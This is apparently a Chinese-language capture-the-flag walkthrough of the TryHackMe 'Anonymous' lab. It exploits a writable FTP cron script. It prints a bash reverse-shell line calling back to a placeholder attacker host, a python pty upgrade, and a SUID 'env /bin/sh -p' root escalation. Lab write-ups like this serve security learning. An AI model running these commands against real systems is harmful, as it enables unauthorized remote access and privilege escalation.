TryHackMe-Anonymous

Anonymous

难度:十分的简单。

信息收集

nmap扫描结果

smb扫描结果

目标开放了smb端口,以及ftp端口。而且smb下似乎是有可读的目录,不过我这里先尝试了匿名登录ftp。

1
ftp 10.10.95.17


使用匿名用户登录成功,进去之后有一个scripts目录,该目录下面还有一个clean.sh脚本文件。不管3721,先把文件都下载下来。再慢慢查看。

clean.sh
1
2
3
4
5
6
7
8
9
10
11
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

可以看到这个任务好像是检查tmp目录下面的文件,如果有文件就删除,并且打印内容到removed_files.log下,如果没有文件也打印没有文件删除。那么我们接下来可以查看下log文件查看removed_files.log后发现还有在运行。

那么接下来就好办了,测试下能不能上传文件如果能上传文件的话,那一切都好办了。修改clean.sh在文件其中添加反弹shell的代码。

1
bash -c "bash -i >& /dev/tcp/your_ip/your_listen_port 0>&1"


结果还真能。。

成功get-shell

user-flag:********************************

提权&漏洞利用

因为是直接反弹回来的,所以不能直接sudo -l查看有没有权限,需要输入

1
python -c 'import pty;pty.spawn("/bin/bash")'

来开启新的tty,才能输入密码。不过sudo 之后提示需要密码,但是我们没有,所以这条路暂时舍弃。搜索下suid位权限,看看有没有能利用的。

找到了一个env,我们可以直接利用它。

1
env /bin/sh -p

root-flag:********************************